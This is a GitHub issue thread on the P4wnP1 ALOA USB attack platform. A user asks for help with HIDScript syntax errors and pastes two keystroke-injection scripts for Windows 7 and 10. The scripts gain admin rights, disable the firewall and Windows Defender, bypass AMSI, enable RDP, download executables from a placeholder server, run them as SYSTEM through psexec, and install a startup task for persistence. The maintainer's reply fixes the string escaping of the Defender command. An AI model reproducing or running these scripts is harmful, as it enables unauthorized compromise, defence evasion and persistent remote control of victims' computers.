RoganDawes/P4wnP1_aloa #136: HIDScript jobs failing with different errors on lines with delay(####); only

ll3N1GmAll, 2019-06-05:
First error on one script:
(anonymous): Line 14:16 Unexpected token ILLEGAL (and 4 more errors)

Second error on another script:
(anonymous): Line 12:8 Unexpected identifier (and 4 more errors)

All lines mentioned in the errors in both scripts are delays of various lengths from 3000-15500.

mame82, 2019-06-09:
Which exact HIDScript are you talking about?

ll3N1GmAll, 2019-06-09:
This is a malduino script of mine I am attempting to port over to ALOA.

mame82, 2019-06-09:
Nice. Anyways, without the script it is hard to help

ll3N1GmAll, 2019-06-11:
I swore I pasted the scripts in <scratches head>... That's odd. Here they are. Sorry for my hallucinations.

WIN7 SCRIPT: 

layout('us');			// US keyboard layout
typingSpeed(100,150)	// Wait 100ms between key strokes + an additional random value between 0ms and 150ms (natural)

press("ESCAPE");
press("GUI r");
delay(3000);
type("powershell Start-Process cmd -Verb runAs\n");
delay(8000);
press("ALT y");
delay(4000);
type("netsh firewall set opmode disable\n");
delay(3000);
type("reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n");
delay(3000);
type("reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f\n");
delay(3000);
type("powershell (new-object System.Net.WebClient).DownloadFile('http://SERVER/winmgnt.txt','%WINDIR%\System32\winmgnt.exe')\n");
delay(15500);
type("powershell (new-object System.Net.WebClient).DownloadFile('http://SERVER/taskmgnt.txt','%WINDIR%\System32\taskmgnt.exe')\n");
delay(15500);
type("%WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\winmgnt.exe\n"); // Run payload with MS signed psexec binary
type("%WINDIR%\System32\winmgnt.exe\n"); // Run payload by itself in case psexec fails
type("schtasks /create /sc onstart /tn WindowsMgr /rl highest /ru SYSTEM /tr "%WINDIR%\System32\winmgnt.exe"\n");
press("y\n");
type("exit\n");
  

WIN10 SCRIPT:  
  
layout('us');			// US keyboard layout
typingSpeed(100,150)	// Wait 100ms between key strokes + an additional random value between 0ms and 150ms (natural)

press("ESCAPE");
press("GUI r");
delay(3000);
type("powershell Start-Process cmd -Verb runAs\n");
delay(8000);
press("ALT y");
delay(4000);
type(""C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true -DisableBehaviorMonitoring $true -DisableIntrusionPreventionSystem $true -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -DisableScriptScanning -DisableRemovableDriveScanning $true\n");
delay(8000);
type("powershell 'Add-MpPreference -ExclusionPath "c:\"'\n");
delay(13000);
type("reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n");
delay(3000);
type("reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f\n");
delay(3000);
type("powershell\n");
delay(15000);
type(""[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"\n");
delay(3000);
type("exit\n");
delay(3000);
type("powershell (new-object System.Net.WebClient).DownloadFile('http://SERVER/winmgnt.txt','%WINDIR%\System32\winmgnt.exe')\n");
delay(15500);
type("powershell (new-object System.Net.WebClient).DownloadFile('http://SERVER/taskmgnt.txt','%WINDIR%\System32\taskmgnt.exe')\n");
delay(15500);
type("%WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\winmgnt.exe\n"); // Run payload with MS signed psexec binary
type("%WINDIR%\System32\winmgnt.exe\n"); // Run payload by itself in case psexec fails
type("schtasks /create /sc onstart /tn WindowsMgr /rl highest /ru SYSTEM /tr "%WINDIR%\System32\winmgnt.exe"\n");
press("y\n");
type("exit\n");

mame82, 2019-07-24:
First, the reported line numbers have an offset, as additional code is added by the P4wnP1 backend, to wrap the script into an anonymous function (avoid pollution of the JavaScript VM pool with global variables). Sorry for lack of documentation in this place.

Secondly, you seem to have ultiple escaping errors in your script. Here is an example:

`type(""C:\Program Files\Windows Defender\MpCmdRun.exe" -Remov...`

The second double quote in the string effectively terminates the JavasScript string, because it is not escaped. It should look something like this:

`type("\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -Remov...`

mame82, 2019-07-24:
Note: Add statements on JavaScript string escaping to possible FAQ